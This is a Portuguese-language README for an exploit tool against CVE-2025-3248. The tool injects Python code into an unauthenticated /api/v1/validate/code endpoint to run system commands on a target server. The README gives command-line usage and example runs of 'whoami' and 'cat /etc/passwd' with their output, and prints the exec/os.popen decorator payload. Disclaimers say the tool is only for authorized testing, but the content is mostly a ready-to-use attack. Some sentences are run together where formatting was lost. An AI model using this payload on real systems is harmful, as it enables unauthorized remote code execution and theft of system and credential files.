
Exploit para CVE-2025-3248: injeta payloads Python elaborados em um endpoint de código de API não autenticado para executar comandos arbitrários no servidor alvo.
CVE-2025-3248 Documentação da Ferramenta de Exploração
Introdução Esta ferramenta é usada para explorar a vulnerabilidade CVE-2025-3248 (uma vulnerabilidade de injeção de código baseada em Python), construindo payloads maliciosos para obter execução remota de comandos (RCE) no servidor alvo. A vulnerabilidade existe em um endpoint de API de uma aplicação web, onde um invasor pode injetar código Python arbitrário através de um ponto de execução não validado.
Aviso importante: Esta ferramenta destina-se apenas a testes de segurança autorizados. Testes de penetração não autorizados podem violar a lei. Certifique-se de ter autorização explícita para testar o sistema alvo.
Funcionalidades
✅ Injeção de código Python malicioso através do endpoint /api/v1/validate/code
✅ Suporte para execução de comandos arbitrários do sistema (ex: whoami, ls)
✅ Tempo limite personalizável (padrão: 10 segundos)
✅ Suporte para saída em formato texto/JSON
✅ Tratamento detalhado de erros e logs
Como usar
Sintaxe básica
python cve-2025-3248.py -t <URL_ALVO> -c "<COMANDO>" [opções]
Descrição dos parâmetros
| Parâmetro | Obrigatório | Descrição |
|---|
-t, --target | Sim | URL alvo (formato: http://ip:porta) |
-c, --command | Sim | Comando do sistema a executar (deve estar entre aspas) |
-o, --output | Não | Formato de saída (text/json, padrão: text) |
--timeout | Não | Tempo limite da requisição (segundos, padrão: 10) |
-v, --verbose | Não | Exibir logs detalhados de execução |
Exemplos de uso
Exemplo 1: Executar comando whoami (formato de saída padrão)
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
Exemplo de saída:
[+] Comando executado com sucesso
--------------------------------------------------
www-data
--------------------------------------------------
Exemplo 2: Saída em formato JSON + logs detalhados
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
Exemplo de saída:
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
Breve análise do princípio da vulnerabilidade
code no endpoint /api/v1/validate/codeexec() diretamente para executar o código Python recebidoimport os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() é acionado para executar comandos do sistemaRisco da vulnerabilidade: Esta vulnerabilidade pode levar ao controle total do servidor. O invasor pode executar comandos arbitrários do sistema, roubar dados sensíveis, implantar backdoors, etc.
Aviso de Segurança
⚠️ Esta ferramenta destina-se APENAS a testes de penetração autorizados ⚠️
Recomendações:
-v para visualizar logs detalhados e evitar errosAmbiente de dependências
requests (deve ser instalada previamente)pip install requests
Descrição de tratamento de erros
| Código de erro | Causa | Solução |
|---|---|---|
[-] URL alvo com formato inválido | URL sem scheme ou host | Verificar formato da URL (ex: http://127.0.0.1:8080) |
[-] Tempo limite da requisição | Alvo excedeu o tempo de resposta | Aumentar o valor do parâmetro --timeout |
[-] Erro de conexão | Alvo inacessível / bloqueado por firewall | Verificar conectividade de rede |
[-] Falha na execução do comando - Código HTTP: 403 | Permissão negada pelo servidor | Confirmar se o serviço alvo permite execução de código |
Detalhes técnicos
POST /api/v1/validate/codeexec/eval)Isenção de responsabilidade: Este documento destina-se exclusivamente a fins de pesquisa e educação em segurança. O autor não se responsabiliza por quaisquer danos diretos ou indiretos resultantes do uso desta ferramenta. Respeite as leis e utilize as ferramentas de segurança de forma legal.